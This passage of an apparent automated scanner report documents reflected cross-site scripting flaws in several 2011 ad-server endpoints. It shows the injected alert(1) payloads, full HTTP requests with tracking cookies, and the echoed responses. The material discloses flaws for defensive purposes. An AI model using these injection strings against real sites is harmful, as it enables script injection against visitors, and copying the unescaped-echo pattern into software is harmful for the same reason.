Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 14 Feb 2011 01:36:12 GMT
Content-Length: 827

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=4071663510365101|cId=3210|cb=1297647330|notifyPort=8080|exId=19|tId=4071
...[SNIP]...
3br.net?anId=40&pubId=3099&advId=27355&campId=2946&vURL=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html37aa2"-alert(1)-"5ae84f10ba7";
</script>
...[SNIP]...

1.48. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f3c3"><script>alert(1)</script>10dcb1064b2 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4f3c3"><script>alert(1)</script>10dcb1064b2 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=4thKjbT4Dd-wLmJ_EvL6OGUx_YihuVVYu3_TfrxVOxLfaqaDzVRu9ZiuBStYaftYPFbUXCL2UgT2Zh2i9n4bdmEFJK3PW8OZmgDnNcPWCfNI4E_LJGBd5ktc9D2EP3iXVzloyRtYmz5WwUlOqhgjJzRf6EtvPvPDy4qyJ60plhIiUcxVMkOk7W6GdnfN9Orwi4ny57OJZgTzL2FsqZrAh5fiWQZAKAOwRHx78cjQB8i-ExJ7_A4Q_x0WiDS5R8s4qPZYQ2rQpBVvfWWYpFe6URy2Vs2VdJ_TjWWvjLV9Q8m6hMviS8YTqb-ZiVtIUBjDzfzTwFruRQFMbT_NyCr5tmotZSQRzCZw0LF6c45BQQz09oHzZ-yryLJ8uFUm4TqTtHFDougM6qn-fCnFGGL4NPUNvmQnKSR_IW4vjpinnmSpjj2_u47YbamQM73IHCy9Sl0ZpaTYKgObLd08Gd0JoGuaLLHRZ-Ykz_TkIVZ9huoJ8VG9LN1TNKQM_NPsV2xeGHi3bYbGKGUdjPIU0cMPnGmxPU3XXT2arCgoL6Dn4SMbxfNR_y_fM9tMo0Ph6oeDvYYKlkyzNn3JdfPZgqqaIviA5QdTAVKvxsbfG_RiFigTLmpyQcn5PksmVWqu3SbN0VyR3eDASlHpj1bavPEOnrozydlNm_TE_r6icluVhvQE5Ov43rl2rHjKBgmJieXzPjWJq1kMte659Vcd5HhCaUJMqEVW9CddSG3ugiIvGpPb38PDFUA8hG6SKkVM5AiGw80gZu3yl7Vvk0bmhH4LCjjLMwDmJjRrWXjcO5EGZgy-ExJ7_A4Q_x0WiDS5R8s4BTpYXsHIzHlWqOeElAAexRy2Vs2VdJ_TjWWvjLV9Q8nWiYtrtggzf6QC_emGCUYHkAYZWo2P43mtp_vZfpxwURmMklWmLOsCWcBHbWrEHfnZfxRZofW-YLqIXc_XLzmrtHFDougM6qn-fCnFGGL4NAnCoYY7ACuNqpuJuqlD4PrpKdIl-vCs8PYIscXyY2wFHIA3ClafPQTXMYm0ZGX1lQ868DsJ8CzRL-qFZYXXGjnjVL9jGjuvVIAupi7jFNwmxmjWmZmvAOPnNuXsYJKsZcpAzSHYH88Cmpasf_VURFf22rMJNM9ndqYziU5Lic-QRj7a56PoySegU7HYB2c8HfiA5QdTAVKvxsbfG_RiFigezlWM8YZNRG9XfqIkin8k0VyR3eDASlHpj1bavPEOntPhusJqVFauiLy6UaFFc3PYmsvrCy4wt-d-LduEaGqhUO6VPDt67tRjGh2NpKtfx8Q-S6gpZovZHf4-kC6dIE7b38PDFUA8hG6SKkVM5AiG7G4qQXY8m01JE-wQyevARsbLIt6lxw4qn7zj9tJ2fQGJD8GhxX6KZrz-6lFiGJ-dRv8YUVgIig-grRaq4S8oT-Q_b1qUvkrI7hhBR8IjByfmHTKIVgzw0wJBikXj03WpHLZWzZV0n9ONZa-MtX1DyZl0YUseit0Cb3G_gMYpmfL9wJ-3B_7kL8dMqUjPBdPRS-kP3YQEvr7AqH2rw9rktoXdbV9sNJrU4cvKljWSeO20cUOi6Azqqf58KcUYYvg0eCIP4EeWu1tLqPD3KXyux9cg7-TCOBWwPvbOtAvH7FGTa5jgFaEbBx4OAtVXexdyPlxg9BhJfaBCNSYQ5Kq_-Sjtcg1-30-9Ex6CEY-Yr1gzbPQ4BjJufC2fQIZLJhJjTiug9ME9M3D4Hl8Eiw362GgMO-O5Hy-7BFA0JHw__mPd1M64cIluMfueZjPGlcvizzBrSDsidMXjw5kLBtnZH3sxbrc1XjPazF6bacT5OH5OfL6S5Ch8nYybd10IPcQ93hujX2-lUqQOZRz7lhE-Mp13Bx7SEoyCM4rv0PtWLZlDJuYINnvP4ltz0zwgi9RdBr-KLFRC4eQNwFThZDiSaEHYLoXdcf54MP-yW5BVHlvKRVBkBjUodw_dLB6IX2KDEvDFvZpoLKOIMM8vL4_UX54AJfo84MmNcJgucmF3a2rT3pH0CBj7HfwbEk4PHUhndSdvNmS_gGLRvueh6oi2M6aEMhx-btVOzA0hsRH2jLUVQcxEhmmaR_l3AS4SvhqrNqEcMkLIEPS56MjZCBdGPtsP2xTDqtDji7OeZPTeV4aXza8_gpDhhNfGv5kRzDqO8mTlK1zd_GN8J_C68v3vm6BzTfJiMvS8kl8QpS3DqrvGcnol-G-iOOCWmycV6dgRNwsJa0K7KBuioHn9OSA6OiovTKpiVvvksy9RWsNaBwlsK1sD2r9fBgo8cuHbz9o6Tiug9ME9M3D4Hl8Eiw362LLnvPdOAVRV_3-HFZurs-NwJI3B7sA3g7sDqxZPuDfgzzBrSDsidMXjw5kLBtnZH7oOoiCwaxJgx3v_OzDlP7JOfL6S5Ch8nYybd10IPcQ9X9Zc-e5Mnab9xws12uVaIR41EcKEDQON3vRYH1ZUr61GHZ56kCOvAMTmw-gDf-xHDkY3JWzdKEsukJ4BiXga1Q5GNyVs3ShLLpCeAYl4GtUORjclbN0oSy6QngGJeBrVn5kB8Bu8c7iHFAXgmGoiK5-ZAfAbvHO4hxQF4JhqIitAbIkJ3D687v0OZkfgvqhELnQlAE28n2DlyK7b-DFMmy50JQBNvJ9g5ciu2_gxTJuBUJX9pmSCLxiuzwYB86MTELbAFv_xsAvubJCJLlla0oa_uPyJAWAqD3ibcNxLhk9ZzfBU98RRGsiE7rLYAF7U0-lEpCQVO21AuaAn_6GWFjz7d-4JRCuozQQLfumpJSE1DAEFgyp5834TD56SR74-Gh_KZ4seqRyrSxDnYx6bbfvAdLEn8TgpYNDQOQBkNz_F4x9ydwRSyIlnBm5mjWTk2dsWUEe8YR0nRJ-RcjY4xKJY8_GDDsXZNc1xnOxIheEQaA4_4EDHKnfUnUEid2opeYGr2g6mjt8EkHand-oCrrsR_OIT6A1FqZldQLQBAfHRgcgF7FIdSZ5_87nT02pdOnckIzBPiMwCCKcMv-7LcniSJ_Z38uuHkYOliRcJOdbpoGbLCuvMNPg3cndaJwsK586AJWmQ44nwkhMoTIzPW2taqTWyyeGxhJe01tYYHhRwe50TGiQ4ayqZvxMwes0JcHudExokOGsqmb8TMHrNCYtqLln3rNkPy2fMYNItjb5p65N4NYIsxswLMnqfZzbqCZXHJ1GbJJRnbnm1mp0j6K931lLoYdbax2TZPhn7gigYHdiLIdqGJN4Fby-yTBP2ufYpAYQqKaBXZ3QHkktVEBQJcQBlsfrYmJhYACPhmlxrA0gThBUR_zElsqQPAsivSfXt6uuP7jvz9fgKyii_iYGj9voxAgcfPraiNme77-893dHG8TFoJbhrCrvd5u6DZXmYt3xjOemA4riPtg-VlcukHHk83m-gUQjwWqAerbhO6rTzKugJUqBqQ9F50l9JRxXHlVSYCTiFzrRayu0fCO6vLYbwbFb6diFeniXAnXYICxs_4rTchCin_F_gXJw3CAsbP-K03IQop_xf4FycNwgLGz_itNyEKKf8X-BcnDcICxs_4rTchCin_F_gXJw3SBYpq5h-OqNGCLdyjyYb4qyq4RHxj-sjEeXvEtPcPdY; fc=Q-i4UMc4QwIi-DRd9R6ia1J9_78D67FqFC0kV3tGd2QJJ7mWye14_2YpDYf2fGJzuDSye8dCcqjb55W88by2Y_lYn6WwWx8I_DeXmnM2x-jLDfaXqd7ordwJWxbMBXbCcEhYog6oHcMAxRPP4dyBk0paMt9KyzBYx_f8zOMt1_UkBxkTNTAXWm9kNSZlguLR5fjP49PUhu7v4L3sHsRyZQ; pf=W2lAvdO3UPK-67n93CR4V70h141EwRpVphJqTZeRapKuzdsXKOJykAJ3JxnPju9g5ehdKFP2wXAGuCUFv7XIPM0FzExGm1jv4Kvu640165OBvBXtoV0UQOpa27TXESVF-de5fP3AwoGiR_AIBPhToig1AM_gTSow1560pWbhh838I1Xi_FMkgIPwMPeBqodwgbWWL1_JBXWn8zgepH7BPbePalyqFZ93Lsfi8SgLVgTh-j-bH1npoySPlo-IWRvpNkaZBgGmnWJmvGYlVmPlSbHlSr1VTT1nlb50Fr5vj40NZDpqhun3lj0r0CvR0Vihm4m9vudXxCMFAjgeVFO5-xpIFGJioNw2vkEYe3YJ8emaUo3Hsp3jaymvGUlYuixmCOI3go4MrecUnPRzHm5YdxPKKY4kV-q2UJvSEkgnXksxeQb5A05wXSsD8Fj_F7za0NBQ4tKieMWx6gEN0MztGbK9Ye_wQX5bwuwz0ovjoTMcI4I2StnJ390lD_AvrOFoljQUjac8_W0UA2peA_VkfivKVPa-K620ApvhUtsRg48; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=15018%7C15018%7C15018%7C15018%7Cundefined%7C15018%7C15018%7C15018%7C15018%7C15018%7C15018%7C15018%7C14983%7C15018%7C15003; rv=1; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sat, 13-Aug-2011 01:34:03 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:34:03 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=2383879606519371855&fpid=4f3c3"><script>alert(1)</script>10dcb1064b2&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.49. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 32ead<script>alert(1)</script>edf430560af was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1483549&pid=190076932ead<script>alert(1)</script>edf430560af&ps=-1&zw=228&zh=215&url=http%3A//www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&v=5&dct=CPAC%20winners%20and%20losers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:02 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "190076932ead<script>alert(1)</script>edf430560af"

   
                                                           </head>
...[SNIP]...

1.50. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload aa72b--><script>alert(1)</script>56c01c56ac8 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1483549aa72b--><script>alert(1)</script>56c01c56ac8&pid=1900769&ps=-1&zw=228&zh=215&url=http%3A//www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&v=5&dct=CPAC%20winners%20and%20losers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:00 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3234


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1483549aa72b--><script>alert(1)</script>56c01c56ac8" -->
...[SNIP]...

1.51. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 98ad8--><script>alert(1)</script>818648b6a was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1483549&pid=1900769&ps=-198ad8--><script>alert(1)</script>818648b6a&zw=228&zh=215&url=http%3A//www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&v=5&dct=CPAC%20winners%20and%20losers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:05 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3667


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-198ad8--><script>alert(1)</script>818648b6a" -->
       <
...[SNIP]...

1.52. http://ads.adxpose.com/ads/ads.js [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 3feb5<script>alert(1)</script>2e70b7c5226 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=YpffvxtzOKuYhLCm_405295693feb5<script>alert(1)</script>2e70b7c5226 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0D346790CFB88D71D4593A30AB7CE8C9; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:37:09 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_YpffvxtzOKuYhLCm_405295693feb5<script>alert(1)</script>2e70b7c5226".replace(/[^\w\d]/g,""),"YpffvxtzOKuYhLCm_405295693feb5<script>
...[SNIP]...

1.53. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ea33"-alert(1)-"3b4b2d0d84c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1570312&9ea33"-alert(1)-"3b4b2d0d84c=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?.s1hAPQwCgD01TAAAAAAAK2gDQAAAAAAAgAQAAIAAAAAAP8AAAABFWJSEwAAAAAAY04TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACWOwUAAAAAAAIAAgAAAAAAmpmZmZmZ8T-amZmZmZnxP5qZmZmZmfE.mpmZmZmZ8T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADacgV4OXmhCUlS6anFfIVdJbtK4S9KioraJLUCAAAAAA==,,http%3A%2F%2Fwww.drudgereport.com%2F,Z%3D300x250%26s%3D667892%26r%3D1%26_salt%3D1162597115%26u%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F,f4e74ee2-37e2-11e0-a10f-001b24783b3e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:34:56 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 14 Feb 2011 02:34:56 GMT
Pragma: no-cache
Content-Length: 4648
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?9ea33"-alert(1)-"3b4b2d0d84c=1&Z=300x250&s=1570312&_salt=2802567516";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A
...[SNIP]...

1.54. http://ads.specificmedia.com/serve/v=5 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b714e'-alert(1)-'2181d872488 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/v=5;m=2;l=5434;cxt=99002376:2166629-99002135:2165456-99013532:2161575;kw=;ts=187841;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0b714e'-alert(1)-'2181d872488 HTTP/1.1
Host: ads.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0502717091279373&output=html&h=250&slotname=5334629240&w=300&lmt=1297666157&flash=10.2.154&url=http%3A%2F%2Fwww.drudgereport.com%2F&dt=1297647258512&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647258544&frm=0&adk=473711736&ga_vid=1491658047.1297647259&ga_sid=1297647259&ga_hid=1857945157&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&eid=30143103&fu=0&ifi=1&dtd=95&xpc=y4g04mCIiz&p=http%3A//www.drudgereport.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5008.928757113086138685

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:33:44 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5007.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 19-Jan-2016 01:33:44 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 386
Expires: Sun, 13 Feb 2011 01:33:44 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<iframe src="http://ads.specificmedia.com/serve/v=5;m=3;l=5434;c=124229;b=785339;ts=20110213203344;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0b714e'-alert(1)-'2181d872488;cxt=99002376:2166629-99002135:2165456-99013532:2161575" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

1.55. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc57b'-alert(1)-'40972d271a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/v=5;m=2;l=5434;cxt=99002376:2166629-99002135:2165456-99013532:2161575;kw=;ts=187841;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0&bc57b'-alert(1)-'40972d271a2=1 HTTP/1.1
Host: ads.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0502717091279373&output=html&h=250&slotname=5334629240&w=300&lmt=1297666157&flash=10.2.154&url=http%3A%2F%2Fwww.drudgereport.com%2F&dt=1297647258512&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647258544&frm=0&adk=473711736&ga_vid=1491658047.1297647259&ga_sid=1297647259&ga_hid=1857945157&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&eid=30143103&fu=0&ifi=1&dtd=95&xpc=y4g04mCIiz&p=http%3A//www.drudgereport.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5008.928757113086138685

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:33:44 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5007.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 19-Jan-2016 01:33:45 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 389
Expires: Sun, 13 Feb 2011 01:33:45 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<iframe src="http://ads.specificmedia.com/serve/v=5;m=3;l=5434;c=124229;b=785339;ts=20110213203344;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0&bc57b'-alert(1)-'40972d271a2=1;cxt=99002376:2166629-99002135:2165456-99013532:2161575" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

1.56. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The value of the AdId request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload ab782><script>alert(1)</script>6e76889d9da was submitted in the AdId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blankab782><script>alert(1)</script>6e76889d9da HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
